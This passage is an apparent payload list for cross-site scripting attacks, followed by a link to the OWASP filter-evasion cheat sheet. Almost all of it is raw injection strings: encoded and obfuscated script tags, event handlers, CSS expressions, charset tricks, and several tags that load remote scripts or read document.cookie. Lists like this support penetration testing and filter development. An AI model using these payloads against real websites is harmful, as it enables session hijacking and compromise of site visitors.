data="data:text/html;base64,%(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b <script>alert(1)</script>0 <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> <embed src="javascript:alert(1)"> <img src="javascript:alert(1)"> <image src="javascript:alert(1)"> <script src="javascript:alert(1)"> <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x <? foo="><script>javascript:alert(1)</script>"> <! foo="><script>javascript:alert(1)</script>"> </ foo="><script>javascript:alert(1)</script>"> <? foo="><x foo='?><script>javascript:alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> <% foo><x foo="%><script>javascript:alert(1)</script>"> <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> <img \x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(1)"> <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> <img src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"= alt=javascript:alert(1)//"> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script --> <!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X <div style="font-family:'foo&#10;;color:red;';">XXX <div style="font-family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29> <style>*{x:expression(javascript:alert(1))}</style> <div style=content:url(%(svg)s)></div> <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> <x style="background:url('x&#1;;color:red;/*')">XXX</x> <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> <x style="behavior:url(%(sct)s)"> <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> <event-source src="%(event)s" onload="javascript:alert(1)"> <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> <script>%(payload)s</script> <script src=%(jscript)s></script> <script language='javascript' src='%(jscript)s'></script> <script>javascript:alert(1)</script> <IMG SRC="javascript:javascript:alert(1);"> <IMG SRC=javascript:javascript:alert(1)> <IMG SRC=`javascript:javascript:alert(1)`> <SCRIPT SRC=%(jscript)s?<B> <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> <BODY ONLOAD=javascript:alert(1)> <BODY ONLOAD=javascript:javascript:alert(1)> <IMG SRC="jav ascript:javascript:alert(1);"> <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> <SCRIPT/SRC="%(jscript)s"></SCRIPT> <<SCRIPT>%(payload)s//<</SCRIPT> <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> <IMG DYNSRC="javascript:javascript:alert(1)"> <IMG LOWSRC="javascript:javascript:alert(1)"> <BGSOUND SRC="javascript:javascript:alert(1);"> <BR SIZE="&{javascript:alert(1)}"> <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <XSS STYLE="behavior: url(%(htc)s);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(1)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> <DIV STYLE="background-image: url(javascript:javascript:alert(1))"> <DIV STYLE="width:expression(javascript:alert(1));"> <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> <XSS STYLE="xss:expression(javascript:alert(1))"> <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> <BASE HREF="javascript:javascript:alert(1);//"> <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> <SCRIPT SRC="%(jpg)s"></SCRIPT> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(1);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(1);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(1)></frameset> <object onerror=javascript:javascript:alert(1)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> <IMG SRC=&{javascript:alert(1);};> <a href="jav&#65ascript:javascript:alert(1)">test1</a> <a href="jav&#97ascript:javascript:alert(1)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert&#x28;1&#x29;">X </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror = prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input type&#61;"date" onfocus="alert(1)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt;!--&gt;&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> ``` ## OWASP XSS Evasion Cheat Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Markdown
h4cker/more_payloads/xxe-injection-payloads.md
